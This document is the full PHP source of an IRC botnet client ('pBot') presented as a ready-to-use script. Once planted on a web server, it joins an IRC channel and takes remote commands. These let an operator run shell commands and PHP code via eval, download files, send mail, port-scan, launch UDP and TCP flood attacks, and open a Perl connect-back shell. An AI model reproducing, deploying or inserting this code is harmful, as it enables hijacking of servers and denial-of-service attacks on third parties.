PHP SCRIPT IRC BOT

1. <?php
2.  
3. /*
4. *
5. * since 2000
6. *
7. *
8. * COMMANDS:
9. *
10. * .user <password> //login to the bot
11. * .logout //logout of the bot
12. * .die //kill the bot
13. * .restart //restart the bot
14. * .mail <to> <from> <subject> <msg> //send an email
15. * .dns <IP|HOST> //dns lookup
16. * .download <URL> <filename> //download a file
17. * .exec <cmd> // uses exec() //execute a command
18. * .sexec <cmd> // uses shell_exec() //execute a command
19. * .cmd <cmd> // uses popen() //execute a command
20. * .info //get system information
21. * .php <php code> // uses eval() //execute php code
22. * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
23. * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
24. * .raw <cmd> //raw IRC command
25. * .rndnick //change nickname
26. * .pscan <host> <port> //port scan
27. * .safe // test safe_mode (dvl)
28. * .inbox <to> // test inbox (dvl)
29. * .conback <ip> <port> // conect back (dvl)
30. * .uname // return shell's uname using a php function (dvl)
31. *
32. */
33.  
34. set_time_limit(0);
35. error_reporting(0);
36. echo "ok!";
37.  
38. class pBot
39. {
40. var $config = array("server"=>"server ip",
41. "port"=>"server port",
42. "pass"=>"",
43. "prefix"=>"rev1k",
44. "maxrand"=>"5",
45. "chan"=>"#udpplain",
46. "chan2"=>"#udpfrag",
47. "key"=>"",
48. "modes"=>"+ps",
49. "password"=>"revikus",
50. "trigger"=>".",
51. "hostauth"=>"*" //
52. );
53. var $users = array();
54. function start()
55. {
56. if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
57. $this->start();
58. $ident = $this->config['prefix'];
59. $alph = range("0","9");
60. for($i=0;$i<$this->config['maxrand'];$i++)
61. $ident .= $alph[rand(0,9)];
62. if(strlen($this->config['pass'])>0)
63. $this->send("PASS ".$this->config['pass']);
64. $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
65. $this->set_nick();
66. $this->main();
67. }
68. function main()
69. {
70. while(!feof($this->conn))
71. {
72. $this->buf = trim(fgets($this->conn,512));
73. $cmd = explode(" ",$this->buf);
74. if(substr($this->buf,0,6)=="PING :")
75. {
76. $this->send("PONG :".substr($this->buf,6));
77. }
78. if(isset($cmd[1]) && $cmd[1] =="001")
79. {
80. $this->send("MODE ".$this->nick." ".$this->config['modes']);
81. $this->join($this->config['chan'],$this->config['key']);
82. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
83. else { $safemode = "off"; }
84. $uname = php_uname();
85. $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
86.  
87. }
88. if(isset($cmd[1]) && $cmd[1]=="433")
89. {
90. $this->set_nick();
91. }
92. if($this->buf != $old_buf)
93. {
94. $mcmd = array();
95. $msg = substr(strstr($this->buf," :"),2);
96. $msgcmd = explode(" ",$msg);
97. $nick = explode("!",$cmd[0]);
98. $vhost = explode("@",$nick[1]);
99. $vhost = $vhost[1];
100. $nick = substr($nick[0],1);
101. $host = $cmd[0];
102. if($msgcmd[0]==$this->nick)
103. {
104. for($i=0;$i<count($msgcmd);$i++)
105. $mcmd[$i] = $msgcmd[$i+1];
106. }
107. else
108. {
109. for($i=0;$i<count($msgcmd);$i++)
110. $mcmd[$i] = $msgcmd[$i];
111. }
112. if(count($cmd)>2)
113. {
114. switch($cmd[1])
115. {
116. case "QUIT":
117. if($this->is_logged_in($host))
118. {
119. $this->log_out($host);
120. }
121. break;
122. case "PART":
123. if($this->is_logged_in($host))
124. {
125. $this->log_out($host);
126. }
127. break;
128. case "PRIVMSG":
129. if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
130. {
131. if(substr($mcmd[0],0,1)==".")
132. {
133. switch(substr($mcmd[0],1))
134. {
135. case "user":
136. if($mcmd[1]==$this->config['password'])
137. {
138. $this->privmsg($this->config['chan'],"[\2Auth\2]: User authenticated. Hello Master $nick");
139. $this->log_in($host);
140. }
141. else
142. {
143. $this->privmsg($this->config['chan'],"[\2Auth\2]: Incorrect Password. Self destruct in 10 secs.joke $nick !!!!");
144. }
145. break;
146. }
147. }
148. }
149. elseif($this->is_logged_in($host))
150. {
151. if(substr($mcmd[0],0,1)==".")
152. {
153. switch(substr($mcmd[0],1))
154. {
155. case "restart":
156. $this->send("QUIT :restart command from $nick");
157. fclose($this->conn);
158. $this->start();
159. break;
160. case "mail": //mail to from subject message
161. if(count($mcmd)>4)
162. {
163. $header = "From: <".$mcmd[2].">";
164. if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
165. {
166. $this->privmsg($this->config['chan'],"[\2mail\2]: Message Not Sent.");
167. }
168. else
169. {
170. $this->privmsg($this->config['chan'],"[\2mail\2]: Message Sent \2".$mcmd[1]."\2");
171. }
172. }
173. break;
174. case "safe":
175. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
176. {
177. $safemode = "on";
178. }
179. else {
180. $safemode = "off";
181. }
182. $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
183. break;
184. case "inbox": //test inbox
185. if(isset($mcmd[1]))
186. {
187. $token = md5(uniqid(rand(), true));
188. $header = "From: <inbox".$token."mikel0188@gmail.com>";
189. $a = php_uname();
190. $b = getenv("SERVER_SOFTWARE");
191. $c = gethostbyname($_SERVER["HTTP_HOST"]);
192. if(!mail($mcmd[1],"InBox Test","#mikel0188@gmail.com. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <my1@email.com>",$header))
193. {
194. $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
195. }
196. else
197. {
198. $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
199. }
200. }
201. break;
202. case "conback":
203. if(count($mcmd)>2)
204. {
205. $this->conback($mcmd[1],$mcmd[2]);
206. }
207. break;
208. case "dns":
209. if(isset($mcmd[1]))
210. {
211. $ip = explode(".",$mcmd[1]);
212. if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
213. {
214. $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
215. }
216. else
217. {
218. $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
219. }
220. }
221. break;
222. case "info":
223. case "vuln":
224. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
225. else { $safemode = "off"; }
226. $uname = php_uname();
227. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
228. break;
229. case "bot":
230. $this->privmsg($this->config['chan'],"[\2bot\2]: just a fucking bot.");
231. break;
232. case "uname":
233. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
234. else { $safemode = "off"; }
235. $uname = php_uname();
236. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
237. break;
238. case "rndnick":
239. $this->set_nick();
240. break;
241. case "raw":
242. $this->send(strstr($msg,$mcmd[1]));
243. break;
244. case "eval":
245. $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
246. break;
247. case "sexec":
248. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
249. $exec = shell_exec($command);
250. $ret = explode("\n",$exec);
251. for($i=0;$i<count($ret);$i++)
252. if($ret[$i]!=NULL)
253. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
254. break;
255.  
256. case "exec":
257. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
258. $exec = exec($command);
259. $ret = explode("\n",$exec);
260. for($i=0;$i<count($ret);$i++)
261. if($ret[$i]!=NULL)
262. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
263. break;
264.  
265. case "passthru":
266. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
267. $exec = passthru($command);
268. $ret = explode("\n",$exec);
269. for($i=0;$i<count($ret);$i++)
270. if($ret[$i]!=NULL)
271. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
272. break;
273.  
274. case "popen":
275. if(isset($mcmd[1]))
276. {
277. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
278. $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
279. $pipe = popen($command,"r");
280. while(!feof($pipe))
281. {
282. $pbuf = trim(fgets($pipe,512));
283. if($pbuf != NULL)
284. $this->privmsg($this->config['chan']," : $pbuf");
285. }
286. pclose($pipe);
287. }
288.  
289. case "system":
290. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
291. $exec = system($command);
292. $ret = explode("\n",$exec);
293. for($i=0;$i<count($ret);$i++)
294. if($ret[$i]!=NULL)
295. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
296. break;
297.  
298.  
299. case "pscan": // .pscan 127.0.0.1 6667
300. if(count($mcmd) > 2)
301. {
302. if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
303. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
304. else
305. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
306. }
307. break;
308.  
309.  
310. case "download":
311. if(count($mcmd) > 2)
312. {
313. if(!$fp = fopen($mcmd[2],"w"))
314. {
315. $this->privmsg($this->config['chan'],"[\2download\2]: Cannot Download... permission denied.");
316. }
317. else
318. {
319. if(!$get = file($mcmd[1]))
320. {
321. $this->privmsg($this->config['chan'],"[\2download\2]: Sorry Not Available \2".$mcmd[1]."\2");
322. }
323. else
324. {
325. for($i=0;$i<=count($get);$i++)
326. {
327. fwrite($fp,$get[$i]);
328. }
329. $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 File Downloaded \2".$mcmd[2]."\2");
330. }
331. fclose($fp);
332. }
333. }
334. else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
335. break;
336. case "die":
337. $this->send("QUIT : $fulldate [-scryptzoid-]");
338. fclose($this->conn);
339. exit;
340. case "logout":
341. $this->log_out($host);
342. $this->privmsg($this->config['chan'],"[\2auth\2]: $nick bleeh!");
343. break;
344. case "udpflood":
345. if(count($mcmd)>3)
346. {
347. $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
348. }
349. break;
350. case "tcpflood":
351. if(count($mcmd)>5)
352. {
353. $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
354. }
355. break;
356. }
357. }
358. }
359. break;
360. }
361. }
362. }
363. $old_buf = $this->buf;
364. }
365. $this->start();
366. }
367. function send($msg)
368. {
369. fwrite($this->conn,"$msg\r\n");
370.  
371. }
372. function join($chan,$key=NULL)
373. {
374. $this->send("JOIN $chan $key");
375. }
376. function privmsg($to,$msg)
377. {
378. $this->send("PRIVMSG $to :$msg");
379. }
380. function notice($to,$msg)
381. {
382. $this->send("NOTICE $to :$msg");
383. }
384. function is_logged_in($host)
385. {
386. if(isset($this->users[$host]))
387. return 1;
388. else
389. return 0;
390. }
391. function log_in($host)
392. {
393. $this->users[$host] = true;
394. }
395. function log_out($host)
396. {
397. unset($this->users[$host]);
398. }
399. function set_nick()
400. {
401. if(isset($_SERVER['SERVER_SOFTWARE']))
402. {
403. if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
404. $this->nick = "[A]";
405. elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
406. $this->nick = "[b]";
407. elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
408. $this->nick = "[C]";
409. else
410. $this->nick = "[D]";
411. }
412. else
413. {
414. $this->nick = "[E]";
415. }
416. $this->nick .= $this->config['prefix'];
417. for($i=0;$i<$this->config['maxrand'];$i++)
418. $this->nick .= mt_rand(0,9);
419. $this->send("NICK ".$this->nick);
420. }
421. function udpflood($host,$packetsize,$time) {
422. $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
423. $packet = "";
424. for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
425. $timei = time();
426. $i = 0;
427. while(time()-$timei < $time) {
428. $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
429. fwrite($fp,$packet);
430. fclose($fp);
431. $i++;
432. }
433. $env = $i * $packetsize;
434. $env = $env / 1048576;
435. $vel = $env / $time;
436. $vel = round($vel);
437. $env = round($env);
438. $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB sent / Media: $vel MB/s ");
439. }
440. function tcpflood($host,$packets,$packetsize,$port,$delay)
441. {
442. $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
443. $packet = "";
444. for($i=0;$i<$packetsize;$i++)
445. $packet .= chr(mt_rand(1,256));
446. for($i=0;$i<$packets;$i++)
447. {
448. if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
449. {
450. $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
451. return 0;
452. }
453. else
454. {
455. fwrite($fp,$packet);
456. fclose($fp);
457. }
458. sleep($delay);
459. }
460. $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets A gift to $host:$port.");
461. }
462. function conback($ip,$port)
463. {
464. $this->privmsg($this->config['chan'],"[\2conback\2]: Trying To Establish Connection $ip:$port");
465. $dc_source = "";
466. if (is_writable("/tmp"))
467. {
468. if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
469. $fp=fopen("/tmp/dc.pl","w");
470. fwrite($fp,base64_decode($dc_source));
471. passthru("perl /tmp/dc.pl $ip $port &");
472. unlink("/tmp/dc.pl");
473. }
474. else
475. {
476. if (is_writable("/var/tmp"))
477. {
478. if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
479. $fp=fopen("/var/tmp/dc.pl","w");
480. fwrite($fp,base64_decode($dc_source));
481. passthru("perl /var/tmp/dc.pl $ip $port &");
482. unlink("/var/tmp/dc.pl");
483. }
484. if (is_writable("."))
485. {
486. if (file_exists("dc.pl")) { unlink("dc.pl"); }
487. $fp=fopen("dc.pl","w");
488. fwrite($fp,base64_decode($dc_source));
489. passthru("perl dc.pl $ip $port &");
490. unlink("dc.pl");
491. }
492. }
493. }
494. }
495.  
496. $bot = new pBot;
497. $bot->start();
498.  
499. ?>